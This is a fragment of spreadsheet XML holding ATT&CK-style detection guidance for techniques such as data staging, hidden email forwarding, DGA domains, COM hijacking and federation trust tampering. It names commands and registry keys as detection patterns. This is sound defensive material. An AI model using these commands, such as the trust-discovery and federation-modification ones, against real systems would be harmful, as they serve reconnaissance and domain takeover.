Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). If a process maintains a long connection during which it consistently sends fixed size data packets or a process opens connections and sends fixed sized data packets at regular intervals, it may be performing an aggregate data transfer. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Monitor for unusual queries to the cloud provider's storage service. Activity originating from unexpected sources may indicate improper permissions are set that is allowing access to data. Additionally, detecting failed attempts by a user for a certain object, followed by escalation of privileges by the same user, and access to the same object may be an indication of suspicious activity.</t>
  </si>
  <si>
    <t>Identify network traffic sent or received by untrusted hosts or networks that solicits and obtains the configuration information of the queried device.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)</t>
  </si>
  <si>
    <t>Identify network traffic sent or received by untrusted hosts or networks. Configure signatures to identify strings that may be found in a network device configuration.(Citation: US-CERT TA18-068A 2018)</t>
  </si>
  <si>
    <t>Identify network traffic sent or received by untrusted hosts or networks that expose MIB content or use unauthorized protocols.(Citation: Cisco Advisory SNMP v3 Authentication Vulnerabilities)</t>
  </si>
  <si>
    <t xml:space="preserve">As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging) Sharepoint audit logging can also be configured to report when a user shares a resource. (Citation: Sharepoint Sharing Events) The user access logging within Atlassian's Confluence can also be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities. </t>
  </si>
  <si>
    <t>Monitor access to code repositories, especially performed by privileged users such as Active Directory Domain or Enterprise Administrators as these types of accounts should generally not be used to access code repositories. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user-based anomalies.</t>
  </si>
  <si>
    <t>Monitor access to Confluence repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies.
User access logging within Atlassian's Confluence can be configured to report access to certain pages and documents through AccessLogFilter. (Citation: Atlassian Confluence Logging) Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.</t>
  </si>
  <si>
    <t xml:space="preserve">The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging). As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should generally not be used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. 
</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data. Further, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands may also be used to collect files such as configuration files with built-in features native to the network device platform.(Citation: Mandiant APT41 Global Intrusion )(Citation: US-CERT-TA18-106A) Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to collect files from a network share. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to collect files from a system's connected removable media. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).</t>
  </si>
  <si>
    <t>Debugger related system checks will likely occur in the first steps of an operation but may also occur throughout as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained. Detecting actions related to debugger identification may be difficult depending on the adversary's implementation and monitoring required. Monitoring for suspicious [Native API](https://attack.mitre.org/techniques/T1106) function calls as well as processes being spawned that gather a variety of system information or perform other forms of Discovery, especially in a short period of time, may aid in detection.
Monitor debugger logs for signs of abnormal and potentially malicious activity.</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor internal and external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.
</t>
  </si>
  <si>
    <t>Monitor external websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.</t>
  </si>
  <si>
    <t>Monitor internal and websites for unplanned content changes. Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation.</t>
  </si>
  <si>
    <t>Detecting the action of deobfuscating or decoding files or information may be difficult depending on the implementation. If the functionality is contained within malware and uses the Windows API, then attempting to detect malicious behavior before or after the action may yield better results than attempting to perform analysis on loaded libraries or API calls. If scripts are used, then collecting the scripts for analysis may be necessary. Perform process and command-line monitoring to detect potentially malicious behavior related to scripts and system utilities such as [certutil](https://attack.mitre.org/software/S0160).
Monitor the execution file paths and command-line arguments for common archive file applications and extensions, such as those for Zip and RAR archive tools, and correlate with other suspicious behavior to reduce false positives from normal user and administrator behavior.</t>
  </si>
  <si>
    <t>Monitor for suspicious or unknown container images and pods in your environment. Deploy logging agents on Kubernetes nodes and retrieve logs from sidecar proxies for application pods to detect malicious activity at the cluster level. In Docker, the daemon log provides insight into remote API calls, including those that deploy containers. Logs for management services or applications used to deploy containers other than the native technologies themselves should also be monitored.</t>
  </si>
  <si>
    <t>Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.</t>
  </si>
  <si>
    <t>Consider analyzing self-signed code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, and common name. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in crafting self-signed code signing certificates.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).</t>
  </si>
  <si>
    <t>Consider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)
Detection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).</t>
  </si>
  <si>
    <t>Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on behaviors relating to the use of exploits (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).</t>
  </si>
  <si>
    <t>Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.</t>
  </si>
  <si>
    <t>Monitor handle opens on drive volumes that are made by processes to determine when they may directly access logical drives. (Citation: Github PowerSploit Ninjacopy)
Monitor processes and command-line arguments for actions that could be taken to copy files from the logical drive and evade common file system protections. Since this technique may also be used through [PowerShell](https://attack.mitre.org/techniques/T1059/001), additional logging of PowerShell scripts is recommended.</t>
  </si>
  <si>
    <t>Look for attempts to read/write to sensitive locations like the partition boot sector, master boot record, disk partition table, or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the &lt;code&gt;\\\\.\\&lt;/code&gt; notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.</t>
  </si>
  <si>
    <t>Look for attempts to read/write to sensitive locations like the partition boot sector or BIOS parameter block/superblock. Monitor for direct access read/write attempts using the &lt;code&gt;\\\\.\\&lt;/code&gt; notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.</t>
  </si>
  <si>
    <t>Look for attempts to read/write to sensitive locations like the master boot record and the disk partition table. Monitor for direct access read/write attempts using the &lt;code&gt;\\\\.\\&lt;/code&gt; notation.(Citation: Microsoft Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.</t>
  </si>
  <si>
    <t>It may be possible to detect domain policy modifications using Windows event logs. Group policy modifications, for example, may be logged under a variety of Windows event IDs for modifying, creating, undeleting, moving, and deleting directory service objects (Event ID 5136, 5137, 5138, 5139, 5141 respectively). Monitor for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes &lt;code&gt;Set federation settings on domain&lt;/code&gt; and &lt;code&gt;Set domain authentication&lt;/code&gt;.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods)(Citation: Microsoft 365 Defender Solorigate) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection)
Consider monitoring for commands/cmdlets and command-line arguments that may be leveraged to modify domain policy settings.(Citation: Microsoft - Update or Repair Federated domain) Some domain policy modifications, such as changes to federation settings, are likely to be rare.(Citation: Microsoft 365 Defender Solorigate)</t>
  </si>
  <si>
    <t>Monitor for modifications to domain trust settings, such as when a user or application modifies the federation settings on the domain or updates domain authentication from Managed to Federated via ActionTypes &lt;code&gt;Set federation settings on domain&lt;/code&gt; and &lt;code&gt;Set domain authentication&lt;/code&gt;.(Citation: Microsoft - Azure Sentinel ADFSDomainTrustMods) This may also include monitoring for Event ID 307 which can be correlated to relevant Event ID 510 with the same Instance ID for change details.(Citation: Sygnia Golden SAML)(Citation: CISA SolarWinds Cloud Detection)
Monitor for PowerShell commands such as: &lt;code&gt;Update-MSOLFederatedDomain –DomainName: "Federated Domain Name"&lt;/code&gt;, or &lt;code&gt;Update-MSOLFederatedDomain –DomainName: "Federated Domain Name" –supportmultipledomain&lt;/code&gt;.(Citation: Microsoft - Update or Repair Federated domain)</t>
  </si>
  <si>
    <t>It is possible to detect GPO modifications by monitoring directory service changes using Windows event logs. Several events may be logged for such GPO modifications, including:
* Event ID 5136 - A directory service object was modified
* Event ID 5137 - A directory service object was created
* Event ID 5138 - A directory service object was undeleted
* Event ID 5139 - A directory service object was moved
* Event ID 5141 - A directory service object was deleted
GPO abuse will often be accompanied by some other behavior such as [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053), which will have events associated with it to detect. Subsequent permission value modifications, like those to SeEnableDelegationPrivilege, can also be searched for in events associated with privileges assigned to new logons (Event ID 4672) and assignment of user rights (Event ID 4704).</t>
  </si>
  <si>
    <t xml:space="preserve">System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation but as part of a chain of behavior that could lead to other activities based on the information obtained.
Monitor processes and command-line arguments for actions that could be taken to gather system and network information, such as `nltest /domain_trusts`. Remote access tools with built-in features may interact directly with the Windows API to gather information. Look for the `DSEnumerateDomainTrusts()` Win32 API call to spot activity associated with [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Harmj0y Domain Trusts) Information may also be acquired through Windows system management tools such as [PowerShell](https://attack.mitre.org/techniques/T1059/001). The .NET method `GetAllTrustRelationships()` can be an indicator of [Domain Trust Discovery](https://attack.mitre.org/techniques/T1482).(Citation: Microsoft GetAllTrustRelationships)
</t>
  </si>
  <si>
    <t>Firewalls and proxies can inspect URLs for potentially known-bad domains or parameters. They can also do reputation-based analytics on websites and their requested resources such as how old a domain is, who it's registered to, if it's on a known bad list, or how many other users have connected to it before.
Network intrusion detection systems, sometimes with SSL/TLS inspection, can be used to look for known malicious scripts (recon, heap spray, and browser identification scripts have been frequently reused), common script obfuscation, and exploit code.
Detecting compromise based on the drive-by exploit from a legitimate website may be difficult. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of browser processes. This could include suspicious files written to disk, evidence of [Process Injection](https://attack.mitre.org/techniques/T1055) for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.</t>
  </si>
  <si>
    <t>Detecting dynamically generated C2 can be challenging due to the number of different algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There are multiple approaches to detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more (Citation: Data Driven Security DGA). CDN domains may trigger these detections due to the format of their domain names. In addition to detecting algorithm generated domains based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.</t>
  </si>
  <si>
    <t>Detection for this technique is difficult because it would require knowledge of the specific implementation of the port calculation algorithm. Detection may be possible by analyzing DNS records if the algorithm is known.</t>
  </si>
  <si>
    <t>Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Elastic Predicting DGA)</t>
  </si>
  <si>
    <t>In general, detecting usage of fast flux DNS is difficult due to web traffic load balancing that services client requests quickly. In single flux cases only IP addresses change for static domain names. In double flux cases, nothing is static. Defenders such as domain registrars and service providers are likely in the best position for detection.</t>
  </si>
  <si>
    <t>There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.
File access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.
Monitor processes and command-line arguments for actions that could be taken to gather local email files.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
Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.
Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include &lt;code&gt;X-MS-Exchange-Organization-AutoForwarded&lt;/code&gt; set to true, &lt;code&gt;X-MailFwdBy&lt;/code&gt; and &lt;code&gt;X-Forwarded-To&lt;/code&gt;. The &lt;code&gt;forwardingSMTPAddress&lt;/code&gt; parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the &lt;code&gt;X-MS-Exchange-Organization-AutoForwarded&lt;/code&gt; header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.</t>
  </si>
  <si>
    <t>Detection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account. This is especially true in cases with hidden auto-forwarding rules. This makes it only possible to reliably detect the existence of a hidden auto-forwarding rule by examining message tracking logs or by using a MAPI editor to notice the modified rule property values.(Citation: Pfammatter - Hidden Inbox Rules)
Auto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include `X-MS-Exchange-Organization-AutoForwarded` set to true, `X-MailFwdBy` and `X-Forwarded-To`. The `forwardingSMTPAddress` parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the `X-MS-Exchange-Organization-AutoForwarded` header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to gather local email files. Monitor for unusual processes accessing local email files.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t>
  </si>
  <si>
    <t>Monitor for unusual login activity from unknown or abnormal locations, especially for privileged accounts (ex: Exchange administrator account).</t>
  </si>
  <si>
    <t>SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)
In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>With symmetric encryption, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures.
In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
Externally monitor the availability of services that may be targeted by an Endpoint DoS.</t>
  </si>
  <si>
    <t>Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.</t>
  </si>
  <si>
    <t>Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack. Externally monitor the availability of services that may be targeted by an Endpoint DoS.</t>
  </si>
  <si>
    <t>Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.</t>
  </si>
  <si>
    <t>Monitor for the deployment of suspicious or unknown container images and pods in your environment, particularly containers running as root. Additionally, monitor for unexpected usage of syscalls such as &lt;code&gt;mount&lt;/code&gt; (as well as resulting process activity) that may indicate an attempt to escape from a privileged container to host. In Kubernetes, monitor for cluster-level events associated with changing containers' volume configurations.</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).</t>
  </si>
  <si>
    <t>Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t xml:space="preserve">Monitoring for additions or modifications of mechanisms that could be used to trigger event-based execution, especially the addition of abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network. Also look for changes that do not line up with updates, patches, or other planned administrative activity. 
These mechanisms may vary by OS, but are typically stored in central repositories that store configuration information such as the Windows Registry, Common Information Model (CIM), and/or specific named files, the last of which can be hashed and compared to known good values. 
Monitor for processes, API/System calls, and other common ways of manipulating these event repositories. 
Tools such as Sysinternals Autoruns can be used to detect changes to execution triggers that could be attempts at persistence. Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.  
Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement. </t>
  </si>
  <si>
    <t>Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious. Command line invocation of tools capable of modifying the Registry for associated keys are also suspicious. Utility arguments and the binaries themselves should be monitored for changes. Monitor Registry keys within &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Monitor the AppCertDLLs Registry value for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017) 
Tools such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls Oct 2007)
Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.</t>
  </si>
  <si>
    <t>Monitor DLL loads by processes that load user32.dll and look for DLLs that are not recognized or not normally loaded into a process. Monitor the AppInit_DLLs Registry values for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as &lt;code&gt;RegCreateKeyEx&lt;/code&gt; and &lt;code&gt;RegSetValueEx&lt;/code&gt;. (Citation: Elastic Process Injection July 2017)
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current AppInit DLLs. (Citation: TechNet Autoruns) 
Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.</t>
  </si>
  <si>
    <t>There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim):
* Shim-Process-Scanner - checks memory of every running process for any shim flags
* Shim-Detector-Lite - detects installation of custom shim databases
* Shim-Guard - monitors registry for any shim installations
* ShimScanner - forensic tool to find active shims in memory
* ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)
Monitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse.</t>
  </si>
  <si>
    <t>Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process.
User file association preferences are stored under &lt;code&gt; [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts&lt;/code&gt; and override associations configured under &lt;code&gt;[HKEY_CLASSES_ROOT]&lt;/code&gt;. Changes to a user's preference will occur under this entry's subkeys.
Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.</t>
  </si>
  <si>
    <t xml:space="preserve">There are opportunities to detect COM hijacking by searching for Registry references that have been replaced and through Registry operations (ex: [Reg](https://attack.mitre.org/software/S0075)) replacing known binary paths with unknown paths or otherwise malicious content. Even though some third-party applications define user COM objects, the presence of objects within HKEY_CURRENT_USER\Software\Classes\CLSID\ may be anomalous and should be investigated since user objects will be loaded prior to machine objects in HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\.(Citation: Elastic COM Hijacking) Registry entries for existing COM objects may change infrequently. When an entry with a known good path and binary is replaced or changed to an unusual value to point to an unknown binary in a new location, then it may indicate suspicious behavior and should be investigated.  
Likewise, if software DLL loads are collected and analyzed, any unusual DLL load that can be correlated with a COM object Registry modification may indicate COM hijacking has been performed. </t>
  </si>
  <si>
    <t>Monitor emond rules creation by checking for files created or modified in &lt;code&gt;/etc/emond.d/rules/&lt;/code&gt; and &lt;code&gt;/private/var/db/emondClients&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Monitor for abnormal usage of the GFlags tool as well as common processes spawned under abnormal parents and/or with creation flags indicative of debugging such as &lt;code&gt;DEBUG_PROCESS&lt;/code&gt; and &lt;code&gt;DEBUG_ONLY_THIS_PROCESS&lt;/code&gt;. (Citation: Microsoft Dev Blog IFEO Mar 2010)
Monitor Registry values associated with IFEOs, as well as silent process exit monitoring, for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as &lt;code&gt;RegCreateKeyEx&lt;/code&gt; and &lt;code&gt;RegSetValueEx&lt;/code&gt;. (Citation: Elastic Process Injection July 2017)</t>
  </si>
  <si>
    <t>Monitor processes for those that may be used to modify binary headers. Monitor file systems for changes to application binaries and invalid checksums/signatures. Changes to binaries that do not line up with application updates or patches are also extremely suspicious.</t>
  </si>
  <si>
    <t>It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the &lt;code&gt;HKLM\SOFTWARE\Microsoft\Netsh&lt;/code&gt; registry key for any new or suspicious entries that do not correlate with known system files or benign software.(Citation: Demaske Netsh Persistence)</t>
  </si>
  <si>
    <t>Locations where &lt;code&gt;profile.ps1&lt;/code&gt; can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet)(Citation: Microsoft Profiles) Example profile locations (user defaults as well as program-specific) include:
* &lt;code&gt;$PsHome\Profile.ps1&lt;/code&gt;
* &lt;code&gt;$PsHome\Microsoft.{HostProgram}_profile.ps1&lt;/code&gt;
* &lt;code&gt;$Home\\\[My ]Documents\PowerShell\Profile.ps1&lt;/code&gt;
* &lt;code&gt;$Home\\\[My ]Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1&lt;/code&gt;
Monitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs.</t>
  </si>
  <si>
    <t>Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.
Tools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.</t>
  </si>
  <si>
    <t>Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.</t>
  </si>
